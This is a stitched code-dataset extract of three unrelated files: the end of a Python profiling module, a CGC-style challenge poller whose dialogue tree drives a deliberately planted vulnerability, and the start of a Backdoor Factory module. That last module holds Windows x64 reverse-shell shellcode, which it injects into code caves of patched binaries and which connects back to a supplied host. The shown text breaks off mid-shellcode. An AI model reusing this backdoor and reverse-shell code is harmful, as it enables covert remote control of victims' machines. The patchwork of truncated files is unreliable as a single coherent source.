            "Functions with Highest Call Frequency (Indirect Calls)",
            key_func=lambda x: x[2] - x[1], # Sort by (cumulative - direct)
            format_line=format_call_frequency,
        )

        # Functions with highest cumulative-to-direct multiplier (call magnification)
        def format_call_magnification(stat):
            func, direct_calls, cumulative_calls, total_time, _, _ = stat
            if direct_calls > 0 and cumulative_calls > direct_calls:
                multiplier = cumulative_calls / direct_calls
                indirect_calls = cumulative_calls - direct_calls
                return (
                    f"{multiplier:.1f}x call magnification, "
                    f"{indirect_calls:d} indirect calls from {direct_calls:d} direct: {_format_func_name(func)}"
                )
            return None

        _print_top_functions(
            aggregated_stats,
            "Functions with Highest Call Magnification (Cumulative/Direct)",
            key_func=lambda x: (x[2] / x[1])
            if x[1] > 0
            else 0, # Sort by cumulative/direct ratio
            format_line=format_call_magnification,
        )
|
python
|
github
|
https://github.com/python/cpython
|
Lib/profiling/sampling/pstats_collector.py
|
from generator.actions import Actions
import random
import string
class MsgNode:
    """A node in the dialogue tree used to generate the C message graph.

    Attributes:
        name      -- C identifier emitted for this node
        options   -- lines expected FROM the peer at this node
        responses -- lines we may send back; responses[i] leads to branches[i]
        branches  -- successor MsgNode objects (a None entry ends the chat)
    """

    def __init__(self, name, options, responses, branches):
        self.name = name
        self.options = options
        self.responses = responses
        self.branches = branches

    def toCDef(self, dumped=None):
        """Return C definitions for this node and its subtree (children first).

        `dumped` maps node names already emitted to 1 so shared subtrees are
        defined only once per traversal.

        Bug fix: the original signature was `toCDef(self, dumped = {})` — a
        mutable default argument, so the memo dict persisted across separate
        top-level calls and any second call returned "".  A fresh dict is now
        created for each outermost call; recursive calls still share one memo.
        """
        if dumped is None:
            dumped = {}
        s = ""
        if self.name in dumped:
            return s
        dumped[self.name] = 1
        # Pre-order dumping: emit children first so their C symbols are
        # defined before this node's initializer references them.
        for b in self.branches:
            if b is not None:
                s += b.toCDef(dumped)
        optionsInitStr = "{"
        for o in self.options:
            optionsInitStr += "\"%s\"," % o
        optionsInitStr += "}"
        responsesInitStr = "{"
        for r in self.responses:
            responsesInitStr += "\"%s\"," % r
        responsesInitStr += "}"
        branchesInitStr = "{"
        for b in self.branches:
            if b is None:
                branchesInitStr += "NULL,"
            else:
                branchesInitStr += "&%s," % b.name
        branchesInitStr += "}"
        s += "MsgNode %s = { %s, %u, %s, %u, %s };\n" % (self.name, optionsInitStr, len(self.options), responsesInitStr, len(self.responses), branchesInitStr)
        return s
# Dialogue tree for the poll's conversation state machine.
# MsgNode(name, options, responses, branches):
#   options   - lines the poller READS from the service at this node
#   responses - lines the poller may WRITE; responses[i] leads to branches[i]
#   branches  - successor nodes (None ends the conversation)
# `patches` records back-edges (cycles): since nodes are declared bottom-up,
# a node cannot reference a later one directly, so the extra branch is
# appended afterwards by applyPatches().
patches = {}
#Alice subtree
alice112111 = MsgNode("alice112111", ["You're weird."], [], [])
alice11211 = MsgNode("alice11211", ["So what does that have to do with me?"],["Nothing. Just nothing."], [alice112111])
alice1121 = MsgNode("alice1121", ["Programs? Like television programs?"], ["No computer programs."], [alice11211])
alice112 = MsgNode("alice112", ["Analyst? What kind of analyst?"], ["I analyze and reverse engineer programs."],[alice1121])
alice111 = MsgNode("alice111", ["What? What are you blabbering about? This is not making any sense."],[],[])
alice11 = MsgNode("alice11", ["Huh? What are you talking about? I never wrote my keys down."], ["That is true, but I can see into your head. Or at least what will become your head.", "True. But I am an analyst."], [alice112,alice111])
alice121 = MsgNode("alice121", ["You crazy. My name is Bob. Not Truman."], [], [])
alice12 = MsgNode("alice12", ["Everything? Like EVERYTHING?"], ["Yes. Everything"], [alice121])
alice1 = MsgNode("alice1", ["What? They are supposed to be encrypted. How did you do that?"], ["Sure they were encrypted. But you left your keys lying around.", "I am the Operating System. I see everything..."], [alice11,alice12])
alice0 = MsgNode("alice0", ["How do you know about Alice?"], ["I read your communications."], [alice1])
#Carol subtree
carol0 = MsgNode("carol0", ["Who is Carol? My name is Bob."], [], [])
#Bob subtree
##Lights subtree
vulnerability11111 = MsgNode("vulnerability11111", ["*Bob helped you by releasing some important information, but apparently you are heartless*"], [], [])
vulnerability1111 = MsgNode("vulnerability1111", ["No. That can't be. No. No. . . . "], ["Sorry but this is it. Out of ideas."], [vulnerability11111])
vulnerability111 = MsgNode("vulnerability111", ["What do you mean you don't know?"], ["Sorry, but I am out of ideas"], [vulnerability1111])
vulnerability11 = MsgNode("vulnerability11", ["Now what?"], ["I don't know."], [vulnerability111])
vulnerability1 = MsgNode("vulnerabiilty1", ["Any others?"], ["Nope", "Sure"], [vulnerability11]) #patch to go back to vulnerability
vulnerability = MsgNode("vulnerability", ["Any one in particular?"], ["XXXXXXXX"], [vulnerability1]) #here is where the vulnerability will exist - we will send them an address and they will send back the value with G for 1 W for 0 and off just as off.
patches[vulnerability1] = vulnerability
lights212211111 = MsgNode("lights212211111", ["Doesn't seem like it to me."], ["Well why don't you read some lights to me."], [vulnerability])
lights21221111 = MsgNode("lights21221111", ["Okay. Well some are green, some are white, and some are just off. Actually, most of them are off."], ["Is there a pattern to them?"], [lights212211111])
lights2122111 = MsgNode("lights2122111", ["Sure. one label says 4347C000 and the next says 4347C001. I am not sure, but I have a feeling that they are magical."], ["Ohh I see. Why don't you tell me about the lights."], [lights21221111])
lights212211 = MsgNode("lights212211", ["The characters seem to be sorted or something."], ["Can you give me an example?"], [lights2122111])
lights21221 = MsgNode("lights21221", ["Well there seems to be a bunch of characters next to every 8 lights."], ["That is interesting.", "What does it say?", "Does it say anything?", "Can you tell me about the label?"],[lights212211, lights212211, lights212211, lights212211])
lights2122 = MsgNode("lights2122", ["Wait. These lights are not just arranged in a grid pattern. They also seem to be labeled."], ["How so?"], [lights21221])
lights2121 = MsgNode("lights2121", ["I am not so sure of that. You may be full of 'it' though."], ["I am offended. Good bye."], [])
lights212 = MsgNode("lights212", ["Umm. Yeah. That sounds like a good idea."], ["Yeah I know. I am full of them.", "What do you see now?"], [lights2121, lights2122])
lights2111 = MsgNode("lights2111", ["Call it intuition okay? I don't know. It's just a feeling. Something in my head tells me that I am 32 bits or something. How about we get back on track now?"], ["Fine. Why don't you go closer for a better look?"], [lights212])
lights211 = MsgNode("lights211", ["No. I didn't count them all. You think I am a computer or something? I can't cound that fast."], ["Then how do you know it's 3 billion?"], [lights2111])
lights21 = MsgNode("lights21", ["Yeah. There must be like 3 billion lights or something."], ["3 billion? That is kind of specific. Did you count them all?", "Why don't you go closer for a better look?"], [lights211, lights212])
lights2 = MsgNode("lights2", ["No not really. There are just a lot of lights."], ["A lot? Like how much a lot?"], [lights21])
lights111 = MsgNode("lights111", ["Why don't we switch places and maybe then you will understand."], ["Sorry. My bad. Do you see anything else?"], [lights2])
lights11 = MsgNode("lights11", ["Why did you ask then?"], ["You know. you sure are testy for someone asking for help."], [lights111])
lights1 = MsgNode("lights1", ["Yea. You know. Like boxes all lined up and stuff."], ["I know what a grid pattern is."], [lights11])
lights0 = MsgNode("lights0", ["Huh? Architect? No I am not an architect. Also, they are just lights, not screens"], [], []) #patch to go back up to lights.
lights = MsgNode("lights", ["They are just lights. Some are lit and others are not. Some are white. Others are green. They do look like they are organized in a grid pattern though."], ["Whao! Are you sure they are just lights and not like screens? Maybe you are the architect or something.","A grid pattern?", "Do you see anything else?"], [lights0, lights1, lights2])
patches[lights0] = lights
##Portal subtree
bob2111 = MsgNode("bob2111", ["Alright FINE!. You want to be a child? I am going to act like one too!"], [], [])
bob211 = MsgNode("bob211", ["IT IS NOT INTERESTING!!!"], ["Yes it is."], [bob2111])
bob21 = MsgNode("bob21", ["Interesting? You mean frightening!"], ["No. I meant interesting."], [bob211])
bob22111 = MsgNode("bob22111", ["AHH! I can't take this anymore."], [], [])
bob2211 = MsgNode("bob2211", ["Don't get snarky on me. I didn't say HOLE because its not A HOLE. It is a portal. It is a hole with shiny lights and stuff."], ["Then why didn't you just say that before?"], [bob22111])
bob221 = MsgNode("bob221", ["Maybe I should just give up now. It's a HOLE!. A HOLE okay? That's your portal."], ["Ohh, why didn't you just say hole then?"], [bob2211])
bob22 = MsgNode("bob22", ["I don't know. I just call it a portal. Use your imagination"], ["Sorry, but I don't have an imagination."], [bob221])
bob2311111_term = MsgNode("bob2311111111", ["Okay. Here goes nothing."], [], [])
bob231111111 = MsgNode("bob231111111", ["Okay. Ready... 1... 2... No. No. I can't do it."], ["Sure you can. YOU CAN DO IT. *rah* *rah* *rah*"], [bob2311111_term])
bob23111111 = MsgNode("bob23111111", ["Umm sure."], ["Okay now jump in.", "Nah let's go from right to left"], [bob231111111]) #needs a patch bob23111112])
bob23111112111 = MsgNode("bob23111112111", ["AHHH. MY HANDS! MY ARMS! THEY ARE ALL OVER THE PLACE. I HAVE HANDS FOR EARS. AND I HAVE A TRUNK. I AM AN ELEPHANT. AN ELEPHANT!!!!!! Ohh wait. w a i t... THAT IS NOT A TRUNK. IT'S MY LEG"], [], [])
bob2311111211 = MsgNode("bob2311111211", ["Nope. Not really. Wait. Wait... I do feel a bit strange. A tingly feeling."], ["Huh? Strange?"], [bob23111112111])
bob2311111_random = MsgNode("bob231111121", ["Okay. Here goes nothing.... Alright. I am back."], ["Well? What happened? Anything interesting?"], [bob2311111211])
bob23111112 = MsgNode("bob23111112", ["Umm sure."], ["Okay now jump in.", "Nah let's go from left to right"], [bob2311111_random, bob23111111])
patches[bob23111111] = bob23111112
bob2311111_trans = MsgNode("bob11111_trans", ["Okay. Here goes nothing... *You find Bob sitting on your keyboard with a bunch of A's scrolling by on the screen. You saved Bob. Congrats.*"], [], [])
bob2311111_recv1 = MsgNode("bob11111_recv1", ["It was like running into a wall. I don't think I can go into that one. *Bob's nose is now like Rudolfs. Red.*"], [], []) #patch to go back to bob2311111
bob2311111_recv = MsgNode("bob11111_recv", ["Okay. Here goes nothing... *BOUNCE* Ouch!"], ["Huh? What happenend?"], [bob2311111_recv1])
bob2311111_fdwait = MsgNode("bob2311111_fdwait", ["Okay. Here goes... *nothing happened*"], [], []) #patch to go back to bob2311111
bob2311111_alloc11 = MsgNode("bob2311111_alloc11", ["Some lights just turned on. Cool. Let's try another portal?"], [], []) #patch to go back to bob2311111
bob2311111_alloc1 = MsgNode("bob2311111_alloc1", ["Hmm. I think things just got brighter in here"], ["Brighter? What do you mean?"], [bob2311111_alloc11])
bob2311111_alloc = MsgNode("bob2311111_alloc", ["Okay. Here goes..."], ["Well? What happened?"], [bob2311111_alloc1])
bob2311111_dealloc11 = MsgNode("bob2311111_dealloc11", ["Some lights just turned off. Cool. Let's try another portal?"], [], []) #patch to go back to bob2311111
bob2311111_dealloc1 = MsgNode("bob2311111_dealloc1", ["Hmm. I think things just got darker in here"], ["Darker? What do you mean?"], [bob2311111_dealloc11])
bob2311111_dealloc = MsgNode("bob2311111_dealloc", ["Okay. Here goes..."], ["Well? What happened?"], [bob2311111_dealloc1])
bob2311111 = MsgNode("bob2311111", ["Sigh. I guess not. Which portal should we try first you think?"], ["I don't know. Let's go from left to right how's that?", "I don't know. Let's go from right to left how's that?", "Number 1", "Number 2", "Number 3", "Number 4", "Number 5", "Number 6", "Number 7"], [bob23111111,bob23111112,bob2311111_term, bob2311111_trans, bob2311111_recv, bob2311111_fdwait, bob2311111_alloc, bob2311111_dealloc, bob2311111_random])
patches[bob2311111_recv1] = bob2311111
patches[bob2311111_fdwait] = bob2311111
patches[bob2311111_alloc11] = bob2311111
patches[bob2311111_dealloc11] = bob2311111
bob231111 = MsgNode("bob231111", ["What? Are you crazy or something?"], ["Well do you have any better ideas?"], [bob2311111])
arm_terminate11 = MsgNode("arm_terminate11", ["No. NO!. NOOOO!!!! I don't feel anything. My arm is gone. IT IS GONE! *Bob passes out and falls down towards his left*"], [], []) #end game
arm_terminate = MsgNode("arm_terminate", ["Okay. Here goes."], ["Feel anything?"], [arm_terminate11])
arm_transmit11 = MsgNode("arm_transmit11", ["Okay. Here goes nothing. *Bob is free. He is now sitting on your keboard and you see BAAAAAA... scrolling across the screen*"], [], [])
arm_transmit1 = MsgNode("arm_transmit1", ["What? Hmm.. I feel something. It clicks."], ["Yes! Yes! That is my keyboard. Just come on out."], [arm_transmit11])
arm_transmit = MsgNode("arm_transmit", ["Okay. Here goes."], ["AHH! I see an arm. I SEE AN ARM!"], [arm_transmit1])
arm_receive11 = MsgNode("arm_receive11", ["NOT COOL. My arm now says 'What is tingly? Take a look perhaps?' I am going to pass out. *Bob passes out*"], [], [])
arm_receive1 = MsgNode("arm_receive1", ["WORDS! WORDS!! My ARM turned INTO WORDS!!!"], ["What?! You found a secret message or something? Cool!"], [arm_receive11])
arm_receive = MsgNode("arm_receive", ["Okay. Here goes. Hmm. Hmm.. Tingly..."], ["What is tingly? Take a look perhaps?"], [arm_receive1])
arm_alloc111112 = MsgNode("arm_alloc111112", ["Alright we have tried this one. Maybe we try another?"], [], []) #patch to go down to "Which portal?" which is bob2311121222
arm_alloc111111 = MsgNode("arm_alloc111111", ["Down boy. Down!"], ["*ruff*, I mean sorry. Let's continue"], [arm_alloc111112])
arm_alloc11111 = MsgNode("arm_alloc11111", ["Interesting. Some lights turned on"], ["COOL! Do it again. Do it again.", "Interesting."], [arm_alloc111111, arm_alloc111112])
arm_alloc1111 = MsgNode("arm_alloc1111", ["Enthusiastic aren't you?"], ["YES! YES! MUST PUSH BUTTON. Push IT!"], [arm_alloc11111])
arm_alloc111 = MsgNode("arm_alloc111", ["Ohh Ohh. I feel something. Feels like a button."], ["PUSH IT"], [arm_alloc1111])
arm_alloc11211 = MsgNode("arm_alloc11211", ["*Bob is now all alone. :'(*"], [], [])
arm_alloc1121 = MsgNode("arm_alloc1121", ["Orange you being a bit impatient?"], ["Arg! I don't have time for your childish games. Bye."], [arm_alloc11211])
arm_alloc112 = MsgNode("arm_alloc112", ["Well ex-CUSE me."], ["I don't have all day! Let's get moving."], [arm_alloc1121])
arm_alloc11 = MsgNode("arm_alloc11", ["Nothing yet."], ["Are you trying hard enough?", "I don't have all day"], [arm_alloc111, arm_alloc112])
arm_alloc1 = MsgNode("arm_alloc1", ["I don't know. I am trying to feel around. Give me a second."], ["Anything Yet?"], [arm_alloc11])
arm_alloc = MsgNode("arm_alloc", ["Okay. Here goes."], ["Anything?"], [arm_alloc1])
bob2311121222 = MsgNode("bob2311121222", ["Which portal?"], ["Number 1", "Number 2", "Number 3", "Number 5"], [arm_terminate, arm_transmit, arm_receive, arm_alloc])
patches[arm_alloc111112] = bob2311121222
bob23111212211 = MsgNode("bob23111212211", ["IT I-S N-O-T FUNNY!"], [":)"], [bob2311121222]) #goes to the question about which portal
bob2311121221 = MsgNode("bob2311121221", ["What? but I am RIGHT handed!!"], ["Oops. :) Sorry. I meant right, left arm it is. FOrgot 'left'."], [bob23111212211])
bob231112122 = MsgNode("bob231112122", ["Right handed"], ["Right arm it is", "Okay left arm then."], [bob2311121221, bob2311121222])
bob231112121 = MsgNode("bob231112121", ["Yeah it does. I don't want to lose my dominate hand."], [], [bob231112122]) #jump to the right handed path
bob23111212 = MsgNode("bob23111212", ["Left or right?"], ["Does it matter?", "Are you left handed or right handed?"], [bob231112121, bob231112122])
bob231112111 = MsgNode("bob231112111", ["What? You can't leave me here like that. Fine. FINE. I'll use my arm"], [], [bob23111212]) #this is a jump to the ARM path
bob23111211 = MsgNode("bob23111211", ["I have lots of time. So here we go okay?"], ["Sure... Just want you to know that I only have about 15 seconds."], [bob231112111])
bob2311121 = MsgNode("bob2311121", ["Umm. What about something smaller like my pinky? I don't think I use that much."], ["Sure. Try that, IF you want to take forver.", "No. I think arm is better. Maybe there is something on the other side to grab a hold of you know?"], [bob23111211, bob23111212])
bob2311122111 = MsgNode("bob2311122111", ["Yes. Sorry."], [], [bob2311121]) #goes back to the main path
bob231112211 = MsgNode("bob231112211", ["I am very sorry. I will never do it again :("], ["Have you learned your lesson?"], [bob2311122111])
bob23111221 = MsgNode("bob23111221", ["Hello? I am sorry?"], [""], [bob231112211])
bob2311122 = MsgNode("bob2311122", ["Like your brain?"], [""], [bob23111221])
bob231112 = MsgNode("bob231112", ["Alright, so any other bright ideas?"], ["Hmm. If not your whole body. What about just a part of you? Like an arm.", "What about something small?"], [bob2311121, bob2311122])
bob23111 = MsgNode("bob23111", ["Well, there is me, but that would not be a good idea now would it?"], ["Sure it is.", "I guess not."], [bob231111,bob231112])
bob2311 = MsgNode("bob2311", ["Nope. There is nothing to throw."], ["Nothing at all?"], [bob23111])
bob231 = MsgNode("bob231", ["Nope. I don't see anything, just what looks like a swirling cloud of gas."], ["Have you tried throwing something into the portals?"], [bob2311])
bob23 = MsgNode("bob23", ["Let me see... There are seven. Seven portals."], ["Can you see beyond any of them?"], [bob231])
bob2 = MsgNode("bob2", ["I don't know. I really don't know. First everything was dark, and then some lights turned on. There seems to be a pttern to the lights, but I don't know. Still very confused. At any rate, then all of a sudden these portals appeared so I started to scream. After a while I started hearing from you through one of them."], ["Interesting", "A portal? What is a portal?", "What do the portals look like?", "How many portals are there?", "Can you describe the lights?"], [bob21, bob22, bob22, bob23, lights])
bob11 = MsgNode("bob11", ["Not a problem. Can you help?"], [], []) #this one needs to jump back to to bob0
bob1 = MsgNode("bob1", ["Dark. Without light."], ["Ohh, yeah. Bad question sorry."], [bob11])
bob0 = MsgNode("bob0", ["I don't know. I don't remember much. I don't see much either, things are kind of dark."], ["What do you mean by kind of dark?", "Well what do you remember?"], [bob1,bob2])
patches[bob11] = bob0
# Root of the tree: the opening exchange fans out to the three subtrees.
head2 = MsgNode ("head2", ["Oh phew. Thank you! My name is Bob and I need some help."], ["Is there something wrong with Alice?", "What is wrong Bob?", "Is Carol okay?"], [alice0, bob0, carol0])
head11 = MsgNode("head11", ["Answer me.", "I know you are there", "*brrring* *brrring* Hey, do you hear that? It's your phone. You should pick it up."], ["", "Hello?", "Who is this?"], [None, head2, head2])
head1 = MsgNode("head1", ["Please?", "Don't leave me here alone."], ["", "Hello?", "Who is this?"], [head11, head2, head2])
head = MsgNode("head", ["Psst", "Hello?", "Psst... I know you are out there. I am stuck here and need some help. Can you please help?"], ["", "Hello?", "Who is this?"], [head1, head2, head2])
def applyPatches():
    """Wire every deferred (cyclic) edge recorded in `patches` into the
    dialogue graph by appending the target node to its source's branches."""
    for source, target in patches.items():
        source.branches.append(target)
def patchesToC():
    """Render the deferred-edge table `patches` as a C applyPatches() function.

    Each entry becomes one assignment `<node>.branches[<slot>] = &<target>;`
    where <slot> starts at the node's current branch count and advances if
    the same node were ever patched twice.
    """
    chunks = ["void applyPatches()\n", "{\n"]
    nextSlot = {}
    for node in patches:
        if node not in nextSlot:
            nextSlot[node] = len(node.branches)
        chunks.append(" %s.branches[%u] = &%s;\n" % (node.name, nextSlot[node], patches[node].name))
        nextSlot[node] = nextSlot[node] + 1
    chunks.append("}\n")
    return "".join(chunks)
#print head.toCDef()
# Wire the deferred cyclic edges (recorded in `patches` above) into the graph
# now that every node object exists.
applyPatches()
#print patchesToC()
class GITC(Actions):
    """State machine that plays the MsgNode dialogue graph over the poller
    I/O channel.

    NOTE(review): this looks like a CGC-style poller; the Actions base class
    (supplying read/write and self.ended) is not visible in this file --
    confirm its contract before changing any of the I/O calls below.
    """
    def _rand(self) :
        # Tiny deterministic counter-style PRNG (period 13).  Not used by
        # _play(), which draws from `random` instead.
        self.seed = (self.seed + 7) % 13
        return (self.seed)
    def start(self) :
        """Reset state and consume the game's opening line."""
        self.seed = 0
        self.curNode = head
        #read the first greeting
        self.read(delim='\n', expect=".*", expect_format='pcre')
    def _play(self) :
        """Advance the conversation by one exchange: pick and send one
        response for the current node, follow the matching branch, then read
        the game's next line.  Sets self.ended on any terminal condition."""
        if self.ended :
            return
        if self.curNode is None :
            self.ended = True
            return
        #lets try to choose an output
        #the game can end naturally (node with no responses)
        if len(self.curNode.responses) == 0 :
            self.ended = True
            return
        if self.curNode is vulnerability :
            # Deterministic path for the vulnerable node: always take branch
            # 0, send the magic value and expect the fixed pattern back.
            r = 0
            self.write("080480a0\n")
            self.read(delim="\n", expect="WGWGWGWG\n") #0x55 -> 0101 0101
        else :
            r = random.randint(0,len(self.curNode.responses) - 1)
            self.write(self.curNode.responses[r] + '\n')
        if len(self.curNode.branches) == 0 : #another ending condition
            self.ended = True
            return
        self.curNode = self.curNode.branches[r]
        if self.curNode is None :
            self.ended = True
            return
        #lets try to choose an output
        #now let's read the next expected input
        if len(self.curNode.options) > 1 : #if there are more than one option then just do a generic match
            self.read(delim='\n', expect=".*", expect_format='pcre')
        else :
            self.read(delim='\n', expect=self.curNode.options[0])
    def end(self) :
        """Close the session by sending three random garbage lines and
        checking the game's three canned give-up replies."""
        # string.letters is Python 2 only (string.ascii_letters on Python 3).
        rand1 = "".join([random.choice(string.letters) for _ in range(random.randint(1,20))])
        rand2 = "".join([random.choice(string.letters) for _ in range(random.randint(1,20))])
        rand3 = "".join([random.choice(string.letters) for _ in range(random.randint(1,20))])
        #make sure the random values will never be valid inputs by appending an unused character such as '`'
        rand1 += '`'
        rand2 += '`'
        rand3 += '`'
        #now write them out
        self.write(rand1 + '\n')
        self.read(delim='\n', expect = "Huh? I don't understand. Come again?")
        self.write(rand2 + '\n')
        self.read(delim='\n', expect = "You are still breaking up.")
        self.write(rand3 + '\n')
        self.read(delim='\n', expect = "Alright fine. I give up.")
|
unknown
|
codeparrot/codeparrot-clean
| ||
'''
Copyright (c) 2013-2015, Joshua Pitts
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
##########################################################
# BEGIN win64 shellcodes #
##########################################################
import struct
from intelmodules import eat_code_caves
class winI64_shellcode():
"""
Windows Intel x64 shellcode class
"""
    def __init__(self, HOST, PORT, SUPPLIED_SHELLCODE):
        """Hold connection parameters and the register save/restore byte
        sequences shared by all win64 payload builders in this class."""
        self.HOST = HOST                            # dotted-quad callback host (string) or None
        self.PORT = PORT                            # callback port (int) or None
        self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE  # path to user shellcode file, used by user_supplied_shellcode_threaded
        self.shellcode = ""                         # last fully assembled payload (see returnshellcode)
        # Saves all general-purpose registers and flags (\x9c = pushfq) so
        # the patched binary's original state can be restored afterwards.
        self.stackpreserve = ("\x90\x90\x50\x53\x51\x52\x56\x57\x54\x55\x41\x50"
                              "\x41\x51\x41\x52\x41\x53\x41\x54\x41\x55\x41\x56\x41\x57\x9c"
                              )
        # Mirror-image restore sequence (\x9d = popfq first, then the pops).
        self.stackrestore = ("\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
                             "\x41\x58\x5d\x5c\x5f\x5e\x5a\x59\x5b\x58"
                             )
        self.apis_needed = None
def pack_ip_addresses(self):
hostocts = []
for i, octet in enumerate(self.HOST.split('.')):
hostocts.append(int(octet))
self.hostip = struct.pack('=BBBB', hostocts[0], hostocts[1],
hostocts[2], hostocts[3])
return self.hostip
    def returnshellcode(self):
        """Return the most recently assembled payload (empty string until one
        of the payload-builder methods has run)."""
        return self.shellcode
def clean_caves_stub(self, CavesToFix):
stub = ("\x48\x31\xC0" # xor rax,rax
"\x65\x48\x8B\x49\x60" # mov rcx,QWORD PTR gs:[rcx+0x60]
"\x48\x8B\x49\x10" # mov rcx,QWORD PTR [rcx+0x10]
"\x48\x89\xCB" # mov rbx,rcx
)
for cave, values in CavesToFix.iteritems():
stub += "\x48\xbf" # mov rdi, value below
stub += struct.pack("<Q", values[0])
stub += "\x48\x01\xDF" # add rdi, rbx
stub += "\x48\xb9" # mov rcx, value below
stub += struct.pack("<Q", values[1])
stub += "\xf3\xaa" # REP STOS BYTE PTR ES:[EDI]
return stub
    def reverse_shell_tcp_inline(self, flItms, CavesPicked={}):
        """
        Modified metasploit windows/x64/shell_reverse_tcp.

        Builds the payload in two parts (shellcode1 = API-resolver stage,
        shellcode2 = connect-back + cmd stage) so the parts can be split
        across code caves when flItms['cave_jumping'] is set, in which case
        a relative jump displacement computed from `breakupvar` is patched
        between them.  Requires self.HOST and self.PORT; returns False if
        either is missing, otherwise (stackpreserve+shellcode1,
        shellcode2+stackrestore).

        NOTE(review): CavesPicked={} is a mutable default, but it is never
        read or mutated in this method, so the shared-default pitfall is
        dormant here.
        """
        if self.PORT is None:
            print ("This payload requires the PORT parameter -P")
            return False
        if self.HOST is None:
            print "This payload requires a HOST parameter -H"
            return False
        breakupvar = eat_code_caves(flItms, 0, 1)
        self.shellcode1 = ("\xfc"
                           "\x48\x83\xe4\xf0"
                           "\xe8")
        # Patch the call displacement: forward/backward jump between caves,
        # or the fixed 0xc0 offset when not cave-jumping.  The hand-tuned
        # constants (-4, -3) account for instruction lengths -- do not touch.
        if flItms['cave_jumping'] is True:
            if breakupvar > 0:
                if len(self.shellcode1) < breakupvar:
                    self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
                                                   len(self.shellcode1) - 4).rstrip("L")), 16))
                else:
                    self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
                                                   breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
            else:
                self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
                                               len(self.stackpreserve) - len(self.shellcode1) - 3)
        else:
            self.shellcode1 += "\xc0\x00\x00\x00"
        # Stage 1: Stephen Fewer style hash-based API resolver (block_api).
        self.shellcode1 += ("\x41\x51\x41\x50\x52"
                            "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
                            "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
                            "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
                            "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
                            "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
                            "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
                            "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
                            "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
                            "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
                            "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
                            "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
                            "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
                            "\x8b\x12\xe9\x57\xff\xff\xff")
        # Stage 2: ws2_32 setup + connect-back; PORT is spliced in
        # network byte order ('!H') and HOST via pack_ip_addresses().
        self.shellcode2 = ("\x5d\x49\xbe\x77\x73\x32\x5f\x33"
                           "\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00"
                           "\x49\x89\xe5\x49\xbc\x02\x00")
        self.shellcode2 += struct.pack('!H', self.PORT)
        self.shellcode2 += self.pack_ip_addresses()
        self.shellcode2 += ("\x41\x54"
                            "\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x4c"
                            "\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff"
                            "\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
                            "\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
                            "\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
                            "\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
                            "\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
                            "\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
                            "\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
                            "\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
                            "\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
